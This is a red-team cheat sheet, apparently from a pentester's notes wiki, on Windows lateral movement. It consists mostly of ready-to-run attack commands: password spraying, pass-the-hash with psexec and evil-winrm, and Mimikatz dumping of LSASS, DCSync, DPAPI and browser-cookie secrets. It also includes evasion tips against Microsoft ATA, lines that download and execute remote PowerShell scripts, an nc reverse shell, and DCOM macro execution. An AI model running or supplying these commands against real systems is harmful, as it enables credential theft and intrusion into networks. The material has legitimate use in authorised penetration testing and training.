Lateral Movement

Tips
Blend in with internal protocols:
SMB ( Psexec, schtasks, sc, WMIC)
RDP
SSH
VNC
WinRM (PowerShell)
​
Firewall configuration
netsh advfirewall firewall add rule name="firestone proxy" dir=in action=allow protocol=tcp localport=45001
Password Spraying
Invoke-DomainSpray from Beau Bullock [BHIS]
​https://blog.ropnop.com/practical-usage-of-ntlm-hashes/​
crackmapexec smb <IP/24> -u usernames -p Passwords --continue-on-success --ufail-limit 3
crackmapexec smb 192.168.10.11 -u Administrator -p '[email protected]' -x whoami --shares
crackmapexec smb 10.55.100.0/24 -u winlab -H <Hash> --local-auth --lsa
​
kerbrute_linux_amd64 password spray -v -d <domain> --dc <IP> users.txt <Pass>
​
#Brute-force password
/kerbrute_linux_amd64 bruteuser --dc <IP> -d <domain.local> rockyou.txt <username>
​
pth-winexe //<IP> -U <Username>%<Pass/hash> cmd 
​
evil-winrm -u <username> -H <Hash> -i <IP>
​
psexec.py <hostname>/Administrator:<password>@192.168.1.104
psexec.py <domain>.<local>/[email protected]<IP> -hashes "<hash>" 
git clone https://github.com/Greenwolf/Spray.git
./spray.sh -smb 172.31.3.8 /users.txt /pass.txt <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <Domain> skipuu 
​
#PTH-Winexe
pth-winexe -U Administrator%<HASH> //<IP>/cmd
pth-winexe --system -U 'admin%<HA:SH>' //192.168.1.22 cmd.exe
​
#WMI
Wmic /node:COMPUTER/user:DOMAIN\USER /password:PASSWORD process call create “COMMAND“
#PowerShell (WMI)
Invoke-WMIMethod -Class Win32_Process -Name Create –ArgumentList $COMMAND –ComputerName $COMPUTER -Credential $CRED
#wmiexec
#Does not drop into NT Authority/SYSTEM
​
#WinRM
evil-winrm -u 'user' -H '<:LM Hash>' -i <IP> -s <PS_SCRIPTS_LOCAL_PATH>
​
winrs –r:COMPUTER COMMAND
​
#PowerShell Remoting
Invoke-Command –computername $COMPUTER -command { $COMMAND}
New-PSSession -Name PSCOMPUTER –ComputerName $COMPUTER; Enter-PSSession -Name PSCOMPUTER
​
iex (iwr http://<IP>/Invoke-Mimikatz.ps1 -UseBasicParsing)
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
Kerberos Double Hop Workaround
Reference: https://posts.slayerlabs.com/double-hop/​
If you obtain the shell through pass the hash or pass the ticket, you perform a network login, which means you run into the Kerberos double hop issue.
The way around it is to perform an interactive login, but that requires the clear text creds.
Psremoting uses pass the ticket. It’s how Kerberos is meant to work and a limitation - it’s actually the entire reason Kerberos delegation was invented.
Often the simplest way is to perform process migration/injection into a system process and perform actions from that, as that acts in the context of the computer account which did a interactive login at startup
$username = 'devmanager'
$password = 'F0rRunning$cheduledTasks!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -ComputerName CASC-DC1.CASCADE.LOCAL -Credential $credential -scriptblock {powershell.exe -c "IEX(iwr http://10.10.14.22/Invoke-PowerShellTcp.ps1 -UseBasicParsing)" }
​
#Invoke hostname on 3rd server
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
    Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
​
#Port forwarding from host to Target's WinRM
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
Enter-PSSession Session1 -Credential domain\user
​
​
#Ref:https://posts.slayerlabs.com/double-hop/
#Creates a new session configuration on the remote computer
#when connected, forces it to always run with the credential provided.
Invoke-Command -ComputerName <Hop1PC> -ScriptBlock { Register-PSSessionConfiguration -Name Creds -RunAsCredential <domain-name>\<domainaccount> -Force }
Invoke-Command -ScriptBlock {\\<Kali-IP>\revshell.exe 10.10.x.x 4445} -Credential  <Hop1PC> -ConfigurationName Creds
​
#Run a process as a different user
$secpasswd = ConvertTo-SecureString "<pass>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<domain\username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
​
Start-Process powershell.exe -Credential $Using:mycreds -NoNewWindow
#Troubleshoot
$s = New-PSSession -Credential $mycreds
Invoke-Command -Session $s -Scriptblock {whoami} 
​
#Enable RDP on target
#1.Add yourself to the remote desktop users group
#2. Enable on target using Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
​
#3.Execute from a shell. Do not execute from PSRemoting session.
#If you execute the following commands from a Remote Powershell session, you will be disconnected because we set the RDP listen port to 5985, 
#so we will have to sc.exe stop WinRM before running Remote Desktop Service
​
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name PortNumber -Value 5985
sc.exe stop WinRM
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
​
#Runas
runas /netonly /user:garrison.local\Administrator powershell.exe
psexec
Required CIFS ticket on target.
Requires manual deletion using sc
#psexec. Drops into NT Authority/SYSTEM
psexec.py BLACKFIELD.local/<user>@<IP> -hashes ":<NT hash>" 
​
#Execute local executable on remote system
psexec.exe \\REMOTECOMPUTER –i -c <localfile.exe> /accepteula
​
#Execute as SYSTEM
psexec -s cmd
​
#enable PSRemote remotely
$computerName = 'REMOTECOMPUTER'
psexec "\\$Computername" -s c:\windows\system32\winrm.cmd quickconfig -quiet 2&>&1> $null 
#OR
PowerShell Remoting
Enabled by default on Server 2012 onwards. Used my Administrators.
Uses HTTP port TCP 5985[Based on WinRM] {This is encrypted traffic} |  5986:SSL
Requires admin privileges on target machine. 
Tip: This can be an enumeration technique.
May need to enable remoting (Enable-PSRemoting) on a Desktop Windows machine, Admin privs are required to do that.
In-depth Guide: :https://pentestn00b.wordpress.com/2016/08/22/powershell-psremoting-pwnage/​
Configuring PS Remoting : https://pentestn00b.wordpress.com/2016/08/22/powershell-psremoting-pwnage/#more-1316​
Types: 
One-to-one
Runs in a process: wsmprovhost
Stateful
Requires Local Admin Privs on target
Credentials are not left on target unless there's CREDSSP, Constrained Delegation
One-to-many
Run command and scripts on thousands of machines even as background jobs.
Idealfor passing hashes and using credentials on multiple computers.
Commands are executed in parallel
Non-Interactive
Commandlet: Invoke-Command
Start an Interactive Session
Tip: Find machines where current user has Local Admin Access using Find-LocalAdminAccess. 
//Works on machines where current user has Local Admin Access.
Enter-PSSession -ComputerName pc1.domain.local 
​
Enter-PSSession -ComputerName 192.168.0.2 -Credential domain\username
​
//Create a new session
New-PSSession -ComputerName 192.168.0.2 -Credential domain\username
Enter-PSSession -ComputerName 192.168.0.2 -Credential domain\username
​
//List sessions
Get-PSSession -ComputerName 192.168.0.2 -Credential domain\username
​
Exit-PSSession
​
#Stateful property
$sess = New-PSSession -ComputerName pc1.domain.local
Enter-PSSession -Session $sess
$proc=Get-Process
​
*Exits & reconnects*
$proc
Enable PS Remoting Remotely
$command = 'cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True;Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force'
Invoke-WmiMethod -Path Win32_process -Name create -ComputerName remote-computer -Credential domain\user -ArgumentList $command
​
#With DA privileges
#https://github.com/samratashok/RACE
Set-RemotePSRemoting –SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
Execute Commands
Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <File containing list of servers>)
Invoke-Command -Session $sessionname -FilePath 'path to the powershell script'
//Where the session argument is:
$sessionname= New-PSSession -ComputerName <IP> -Credential <domain/username> -Name anysessionname
​
#Load from function store
. .\name_of_function.ps1
Invoke-Command -ComputerName Server01 -ScriptBlock ${function:name_of_function}
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
​
#Opens new cmd window
runas /user:<domain>\<user> cmd.exe
​
#Start a process as another user
$username = "DOMAIN\USER"
$password = "PASSWORD"
$credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @($username,(ConvertTo-SecureString -String $password -AsPlainText -Force))
Start-Process  nc64.exe -ArgumentList '-e cmd.exe xx.xx.xx.xx 80' -Credential ($credentials)
SharpSploit
Installation: https://github.com/cobbr/SharpSploit​
​
​https://king-sabri.net/how-to-compile-embed-and-use-sharpsploit​
​https://www.youtube.com/watch?reload=9&v=CndMDvjX8dg​
Skip to 31:40
menu
SharpSploit.Credentials.Mimikatz.SamDump()
Mimikatz
The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver
Run Powershell as Administrator
Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script.
Requires administrator and often debug rights.
References:
​https://www.sans.org/reading-room/whitepapers/tools/mimikatz-overview-defenses-detection-36780​
​https://adsecurity.org/?page_id=1821​
#Ways to dump credentials from memory
​
--
-Dumping LSASS from Task Manager
get-process lsass
tasklist | findstr lsass
procdump.exe -accepteula -ma “lsass.exe” out.dmp
procdump.exe -accepteula -ma 580 out.dmp
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\out.dmp full
​
crackmapexec smb 192.168.0.76 -u testadmin -p Password123 --lsa
​
#From Windows
sekurlsa::minidump  c:\lsass.dmp
log lsass.txt
sekurlsa::logonPasswords
​
#From Linux
pypykatz lsa minidump lsass.DMP 
--
​
​
#Enable WDigest to store clear-text credentials
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
sekurlsa::wdigest
​
sekurlsa::logonpasswords
​
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
kerberos::ptt <file>.kirbi
misc::skeleton
​
lsadump::lsa /inject
token::elevate
lsadump::sam
lsadump::secrets
lsadump::trust /patch
lsadump::lsa /patch
​
lsadump::dcsync /user:dcorp\krbtgt
​
#Cached logons. Can’t perform “pass-the-hash” style attacks with this type of hash.
"token::elevate" "lsadump::cache"
hashcat -m2100 '$DCC2$10240#<NAME>#<HASH>' /usr/share/wordlists/rockyou.txt --force --potfile-disable
​
#Restore NT hash of a user
lsadump::setntlm /user:<user> /ntlm:<hash>
​
#Export private certificates
Invoke-Mimikatz –DumpCerts
​
#SSP Attack: Store passwords of all logins in clear-text to c:\Windows\System32\mimilsa.log
"privilege::debug" "misc::memssp"
​
-----
#Credential Manager 
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Vault"
"vault::list"
​
#Extract credentials from Credential Vault from "\AppData\Local\Microsoft\Credentials"
"vault::cred"
​
#List plain-text creds [Risky]
"vault::cred" /patch
​
-----
#DPAPI Abuse
​
dir /a c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
​
#Copy Master Key
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file>\
​
#Grab GUID Master Key value
dir /a c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value>
​
#Grab Master Key to Decrypt
dpapi::masterkey /in:c:\Users\<username>\appdata\roaming\microsoft\protect\<GUID Master key value> /rpc
​
#Decrypt
dpapi::cred /in:c:\Users\<username>\appdata\local\microsoft\credentials\<Credential file> /masterkey:<Key value from above command>
​
--
#Dump Domain-wide DPAPI Backup Key from DC
lsadump::backupkeys /system:<DC> /export
​
#Decrypt target user's master key using DPAPI Backup key
dpapi::masterkey /in:"<User-master-key>" /pvk:"Domain-backup-key"
​
#Decrypt cookie values with target user's master key
dpapi::chrome /masterkey:<user-master-key> /in:<Path-to-chrome-cookies>
--
#Crack masterkey with user's clear-text pass
dpapi::masterkey /in:<Users-key> /sid:<User-SID> /password:<password> /protected
​
#Without knowing the password, but with code exec, extract domain key from DC
dpapi::masterkey /in:"%appdata\Microsoft\Protect\<SID>\<Master-key-GUID> /rpc
​
#Decrypt credentials from Windows Vault using master key
dpapi::creds /in:<creds> /masterkey:<masterkey> /unprotect
Over Pass The Hash
Obtain Kerberos tickets from NTLM hash.
An attacker can leverage the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account, but require Kerberos authentication to reach your destination.
Likely to cause an alert since the encryption method of the EncryptedTimestamp field in AS_REQ is being downgraded.
To make this attack stealthier, use NTLM + AES keys [aes256_hmac + aes128_hmac]
aes128 keys can be specified even if they do not actually exist.
​http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/​
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'
​
#To bypass Microsoft ATA, pass AES keys as well.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /aes256:<aeshash> /aes128:<Aes key> /run:powershell.exe"'
​
#Get a reverse shell using NTLM hash
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''<IP>/Invoke-PowerShellTcp.ps1''))'
Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\blah\reverse.bat
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.local /ntlm:<ntlm> /run:C:\blah\reverse.bat"'
Steal token from notepad process.
Rubeus
All that you can do with Rubeus : Reference : 
​https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/​
​https://github.com/GhostPack/Rubeus#asktgt​
#Convert clear-text password to hash
Rubeus.exe hash /password:Password123!
Rubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local
​
#Request a TGT
Rubeus.exe asktgt /user:<user> /rc4:<hash> /ptt
​
#Request a TGT impersonating Administrator
.\Rubeus.exe s4u /user:<user A> /rc4:<User A's hash> /impersonateuser:Administrator /msdsspn:"CIFS/<Service-PC-Name>" /ptt
​
#.\kekeo.exe
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
#Request TGS 
tgs::s4u /tgt:<TGT-file.kirbi> /user:[email protected]<domain> /service:cifs/dcorpmssql.dollarcorp.moneycorp.LOCAL
​
#Monitor for new TGTs
.\Rubeus.exe monitor /interval:5 /nowrap
​
#By default TGTs are valid for 10h. However TGTs can be renewed for upto 7 days
Rubeus.exe renew /ticket:<ticket> /autorenew
DCOM
​Reference​
DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.
Requires LA privileges on target.
Requires the presence of Microsoft Office on the target computer.
#Outlook
Reference: https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
​
$com = [Type]::GetTypeFromProgID('Outlook.Application’,’192.168.99.152’)
$object = [System.Activator]::CreateInstance($com)
$RemoteScriptControl = $object.CreateObject(“ScriptControl”)
​
#Compiling the “payload” in C#, & pass it to DotNetToJScript. Save output to $code
$RemoteScriptControl.Language = “JScript”
$RemoteScriptControl.AddCode($code)
​
​
#Excel: Create a macro-enabled excel docm
Reference: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
​
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("Excel.Application","<Remote-IP>"))
$LocalPath = "C:\Users\jeff_admin.corp\myexcel.xls"
$RemotePath = "\\192.168.1.110\c$\myexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $True)
$Path = "\\192.168.1.110\c$\Windows\sysWOW64\config\systemprofile\Desktop"
$temp = [system.io.directory]::createDirectory($Path)
$Workbook = $com.Workbooks.Open("C:\myexcel.xls")
$com.Run("mymacro")
​
PSScript: https://gist.github.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b
Invoke-ExcelMacroPivot -Target "192.168.99.152" -RemoteDocumentPath "C:\Book1.xlsm" -MacroName "Auto_Open"
​
#PowerPoint: Create a PowerPoint add-in from this content, you must save as either a PPA / PPAM file
Reference: https://attactics.org/2018/02/dcom-lateral-movement-powerpoint/
PSScript: https://github.com/attactics/Invoke-DCOMPowerPointPivot/blob/master/Invoke-DCOMPowerPointPivot.ps1
​
$com = [activator]::**CreateInstance**([type]::**GetTypeFromProgId**("PowerPoint.Application", "10.10.10.10"))
$addin = $com.AddIns.**Add**("c:\testfile.ppam")
WMI
Matt Graeber's Whitepaper​
​Offensive WMI-Series​
​SpecterOps​
​MDSec​
Port Forwarding
gss-api proxy
This creates a proxy on port 8080 on the target.
Once port forward is set up to the attackers host, gss-api proxy enabled us to hijack the victim's active kerberos tickets to access intranet sites.
#May need to bypass UAC initially
https://github.com/mikkolehtisalo/gssapi-proxy
Firewall Rules Modification
netsh advfirewall firewall add rule name="NAME" dir=in action=allow protocol=tcp localport=PORT
​
#Metasploit
use multi/manage/autoroute
​
#Reverse port forward. 
run portfwd -R -p <Remote pivot port> -l <Local port to listen on> -L <Local Host IP to listen on>
​
#Set up SOCKS proxy [/etc/proxychains.conf] 
use auxiliary/server/socks4a
to same as -l
Plink
Download from here​
Copy binary + Private_Key.ppk to target.
Establish reverse connection to Attacker's SSH server to create an SSH tunnel.
gedit /etc/ssh/sshd_config
Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers.
Transfer binary to the target
Use it to create a reverse connection.
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT [email protected]_IP -i KEYFILE -N
Keys  will not work properly here. Convert from id_rsa to KEY.ppk
#Generate SSH keys using ssh-keygen
sudo apt install putty-tools
puttygen KEYFILE -o OUTPUT_KEY.ppk
The resulting .ppk file can then be transferred to the Windows target and used in exactly the same way as with the Reverse port forwarding taught in the previous task (despite the private key being converted, it will still work perfectly with the same public key we added to the authorized_keys file)
​
Proxy
- Article on using a proxy to an internal network. https://www.blackhillsinfosec.com/a-toast-to-kerberoast/​
#Proxychains
#/etc/proxychains.conf [Disable 'proxy_dns']
socks4 127.0.0.1 8080
​
#For Kerberos process to work, include entries for FQDN and NetBIOS names
10.10.10.22 small.domain.com
10.10.10.22 dc-01
10.10.10.23 workstation-01
​
#Metasploit
auxiliary/server/socks4a
SET SRVHOST 0.0.0.0
SET SRVPORT 8080
route add 10.10.10.0 255.255.255.0 1
exploit
​
#Execute required tool
proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103
​
​
Last modified 1yr ago
Lateral Movement

Tips

​

Firewall configuration

Password Spraying

Kerberos Double Hop Workaround

psexec

PowerShell Remoting

Start an Interactive Session

Enable PS Remoting Remotely

Execute Commands

SharpSploit

Mimikatz

Over Pass The Hash

Rubeus

DCOM

WMI

Port Forwarding

gss-api proxy

Firewall Rules Modification

Plink

Proxy

- Article on using a proxy to an internal network. https://www.blackhillsinfosec.com/a-toast-to-kerberoast/​

- Article on using a proxy to an internal network. https://www.blackhillsinfosec.com/a-toast-to-kerberoast/
